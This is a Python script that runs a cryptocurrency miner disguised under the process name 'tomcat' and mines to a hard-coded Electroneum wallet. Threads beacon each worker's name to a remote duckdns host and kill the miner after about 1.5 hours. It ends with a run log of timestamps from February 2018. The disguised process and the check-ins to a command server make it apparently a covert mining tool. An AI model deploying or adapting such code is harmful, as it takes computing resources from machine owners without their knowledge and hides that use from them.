import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:02:05.560177
#2018-02-17 16:50:07.145613
#2018-02-17 18:39:01.996636
#2018-02-17 20:27:01.726401
#2018-02-17 22:14:01.384766
#2018-02-17 23:58:03.494615
#2018-02-18 01:49:05.318114
#2018-02-18 03:36:05.758889
#2018-02-18 05:23:05.423531
#2018-02-18 07:14:05.283484
#2018-02-18 09:02:04.790921
#2018-02-18 10:49:06.362461
#2018-02-18 12:34:07.596527
#2018-02-18 14:21:05.831120
#2018-02-18 16:12:01.709753
#2018-02-18 18:00:10.240486
#2018-02-18 19:47:05.135907
#2018-02-18 21:32:07.913442
#2018-02-18 23:21:03.966409
#2018-02-19 01:08:04.032812
#2018-02-19 02:54:06.629819
#2018-02-19 04:40:06.734158
#2018-02-19 06:24:01.643452
#2018-02-19 08:13:02.114743
#2018-02-19 10:03:07.274045
#2018-02-19 11:51:09.236370
#2018-02-19 13:38:07.362695
#2018-02-19 15:27:04.915893
#2018-02-19 17:16:07.932694
#2018-02-19 19:05:07.242432
#2018-02-19 20:50:07.611445
#2018-02-19 22:39:06.488079
#2018-02-20 00:24:01.309775
#2018-02-20 02:11:07.021673
#2018-02-20 04:02:04.359361
#2018-02-20 05:45:05.710050
#2018-02-20 07:31:09.108581
#2018-02-20 09:16:01.252211
#2018-02-20 10:59:01.462137
#2018-02-20 12:46:01.721826
#2018-02-20 14:31:08.560782
#2018-02-20 16:16:12.376251
#2018-02-20 18:02:06.208834
#2018-02-20 19:53:08.944405
#2018-02-20 21:42:05.945274
#2018-02-20 23:25:04.160548
#2018-02-21 01:12:04.085669
#2018-02-21 02:59:04.317839
#2018-02-21 04:47:01.982897
#2018-02-21 06:34:07.626475
#2018-02-21 08:21:09.132511
#2018-02-21 10:06:01.796048
#2018-02-21 11:53:04.616484
#2018-02-21 13:43:09.072547
#2018-02-21 15:27:08.404914
#2018-02-21 17:18:02.172991
#2018-02-21 19:06:01.306771
#2018-02-21 20:54:06.463849
#2018-02-21 22:41:08.646455
#2018-02-22 00:29:08.447327
#2018-02-22 02:18:01.794401
#2018-02-22 04:03:05.321698
#2018-02-22 05:49:06.666794
#2018-02-22 07:36:04.495456
#2018-02-22 09:24:04.980549
#2018-02-22 11:09:08.854953
#2018-02-22 12:55:04.403669
#2018-02-22 14:42:06.083047
#2018-02-22 16:26:07.777969
#2018-02-22 18:14:06.143969
#2018-02-22 20:03:08.485622
#2018-02-22 21:51:01.813110
#2018-02-22 23:40:05.007171
#2018-02-23 01:31:06.221038
#2018-02-23 03:19:04.328156
#2018-02-23 05:04:02.100340
#2018-02-23 06:50:08.033150
#2018-02-23 08:38:02.002866
#2018-02-23 10:52:05.967662
#2018-02-23 12:49:04.506516
#2018-02-23 14:33:08.912302
#2018-02-23 16:22:08.443778
#2018-02-23 18:08:05.546979
#2018-02-23 19:53:06.128213
#2018-02-23 21:37:03.396469
#2018-02-23 23:26:01.770344
#2018-02-24 01:18:06.130692
#2018-02-24 03:08:05.718224
#2018-02-24 04:54:04.651245
#2018-02-24 06:43:03.638842
#2018-02-24 08:32:06.901443
#2018-02-24 10:20:07.318157
#2018-02-24 12:16:01.369173
#2018-02-24 14:07:06.120909
#2018-02-24 15:54:04.071199
#2018-02-24 17:44:07.681569
#2018-02-24 19:32:01.439892
#2018-02-24 21:20:06.489467
#2018-02-25 01:19:07.702339
#2018-02-25 05:21:07.922036
#2018-02-25 11:34:07.782676